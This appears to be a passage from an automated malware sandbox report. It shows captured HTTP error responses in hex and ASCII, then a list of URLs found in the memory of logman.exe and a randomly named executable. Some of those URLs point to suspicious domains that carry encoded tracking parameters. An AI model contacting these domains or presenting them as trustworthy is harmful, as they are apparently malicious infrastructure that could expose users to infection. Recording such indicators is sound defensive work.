Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 10 Jan 2025 15:44:41 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 10 Jan 2025 15:44:44 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 10 Jan 2025 15:44:46 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closex-powered-by: PHP/5.6.40set-cookie: csrf_cookie_name=1dd8f356cad07854855386b19d5fe9ef; expires=Fri, 10-Jan-2025 17:44:52 GMT; Max-Age=7200; path=/content-type: text/html; charset=UTF-8content-length: 196content-encoding: gzipvary: Accept-Encodingdate: Fri, 10 Jan 2025 15:44:52 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffData Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 4f bb 6e c3 30 0c 9c ad af 60 b5 b7 42 b6 0c 34 81 a2 f5 dc 0e 01 82 8c 8c c5 56 02 14 2a 95 69 17 f9 fb c0 4e a6 c3 bd 70 38 7c f9 fc fa 38 9c be 07 48 76 29 e4 70 05 28 ac bf bd 17 f5 ab 20 1c c9 e1 45 8c 61 4c dc 26 b1 de cf f6 f3 ba 5f 5d cb 56 84 86 d6 6a c3 f0 20 ce 61 78 96 ce 35 de c8 75 18 f3 02 39 f6 7e ac 6a 9c 55 9a 27 d7 75 98 76 f4 ae b0 95 e1 c8 13 0c 3a d6 59 4d 9a 44 0c 69 b7 65 ae 74 48 02 3c 5a ae 0a b7 3a 43 e2 45 a0 c9 df 2c 93 49 84 3c 81 56 03 2e a5 fe 4b 7c c3 70 a5 0e 43 cc 0b 39 0c 8f 7d 0c db b7 3b c1 62 56 05 eb 00 00 00 Data Ascii: -On0`B4V*iNp8\|8Hv)p( EaL&_]Vj ax5u9~jU'uv:YMDietH<Z:CE,I<V.K\|pC9};bV
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closex-powered-by: PHP/5.6.40set-cookie: csrf_cookie_name=72c6b904c39735c8958616180baef3de; expires=Fri, 10-Jan-2025 17:44:55 GMT; Max-Age=7200; path=/content-type: text/html; charset=UTF-8content-length: 196content-encoding: gzipvary: Accept-Encodingdate: Fri, 10 Jan 2025 15:44:55 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffData Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 4f bb 6e c3 30 0c 9c ad af 60 b5 b7 42 b6 0c 34 81 a2 f5 dc 0e 01 82 8c 8c c5 56 02 14 2a 95 69 17 f9 fb c0 4e a6 c3 bd 70 38 7c f9 fc fa 38 9c be 07 48 76 29 e4 70 05 28 ac bf bd 17 f5 ab 20 1c c9 e1 45 8c 61 4c dc 26 b1 de cf f6 f3 ba 5f 5d cb 56 84 86 d6 6a c3 f0 20 ce 61 78 96 ce 35 de c8 75 18 f3 02 39 f6 7e ac 6a 9c 55 9a 27 d7 75 98 76 f4 ae b0 95 e1 c8 13 0c 3a d6 59 4d 9a 44 0c 69 b7 65 ae 74 48 02 3c 5a ae 0a b7 3a 43 e2 45 a0 c9 df 2c 93 49 84 3c 81 56 03 2e a5 fe 4b 7c c3 70 a5 0e 43 cc 0b 39 0c 8f 7d 0c db b7 3b c1 62 56 05 eb 00 00 00 Data Ascii: -On0`B4V*iNp8\|8Hv)p( EaL&_]Vj ax5u9~jU'uv:YMDietH<Z:CE,I<V.K\|pC9};bV
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closex-powered-by: PHP/5.6.40set-cookie: csrf_cookie_name=d5496703b2e2cd91e435e2cfe33cb86a; expires=Fri, 10-Jan-2025 17:44:57 GMT; Max-Age=7200; path=/content-type: text/html; charset=UTF-8content-length: 196content-encoding: gzipvary: Accept-Encodingdate: Fri, 10 Jan 2025 15:44:57 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffData Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 4f bb 6e c3 30 0c 9c ad af 60 b5 b7 42 b6 0c 34 81 a2 f5 dc 0e 01 82 8c 8c c5 56 02 14 2a 95 69 17 f9 fb c0 4e a6 c3 bd 70 38 7c f9 fc fa 38 9c be 07 48 76 29 e4 70 05 28 ac bf bd 17 f5 ab 20 1c c9 e1 45 8c 61 4c dc 26 b1 de cf f6 f3 ba 5f 5d cb 56 84 86 d6 6a c3 f0 20 ce 61 78 96 ce 35 de c8 75 18 f3 02 39 f6 7e ac 6a 9c 55 9a 27 d7 75 98 76 f4 ae b0 95 e1 c8 13 0c 3a d6 59 4d 9a 44 0c 69 b7 65 ae 74 48 02 3c 5a ae 0a b7 3a 43 e2 45 a0 c9 df 2c 93 49 84 3c 81 56 03 2e a5 fe 4b 7c c3 70 a5 0e 43 cc 0b 39 0c 8f 7d 0c db b7 3b c1 62 56 05 eb 00 00 00 Data Ascii: -On0`B4V*iNp8\|8Hv)p( EaL&_]Vj ax5u9~jU'uv:YMDietH<Z:CE,I<V.K\|pC9};bV
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40set-cookie: csrf_cookie_name=7078c20c62b822c92d1ce806daae05bb; expires=Fri, 10-Jan-2025 17:45:00 GMT; Max-Age=7200; path=/content-type: text/html; charset=UTF-8content-length: 234date: Fri, 10 Jan 2025 15:45:00 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 3c 68 31 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 09 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>404 Page Not Found</title></head><body><div id="container"><h1>404 Page Not Found</h1><p>The page you requested was not found.</p></div></body></html>

Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFn
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://digi-searches.com/Cousins.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://digi-searches.com/Lucinda.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://digi-searches.com/Pieces.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX6
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://digi-searches.com/September.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSF
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.00000000044B8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://maximumgroup.co.za/tw42/?V8=lppBzHasG2q3W2gwBEigKs
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.Deacapalla.online
Source: WnOFOMnqmLQAP.exe, 00000007.00000002.4506381463.00000000055C6000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.al-madinatraders.shop
Source: WnOFOMnqmLQAP.exe, 00000007.00000002.4506381463.00000000055C6000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.al-madinatraders.shop/qfbg/
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.deacapalla.online/__media__/design/underconstructionnotice.php?d=deacapalla.online
Source: logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.deacapalla.online/__media__/js/trademark.php?d=deacapalla.online&type=ns
Source: logman.exe, 00000005.00000002.4505185726.0000000004490000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000003E70000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.vh5g.sbs/
Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdn.consentmanager.net
Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
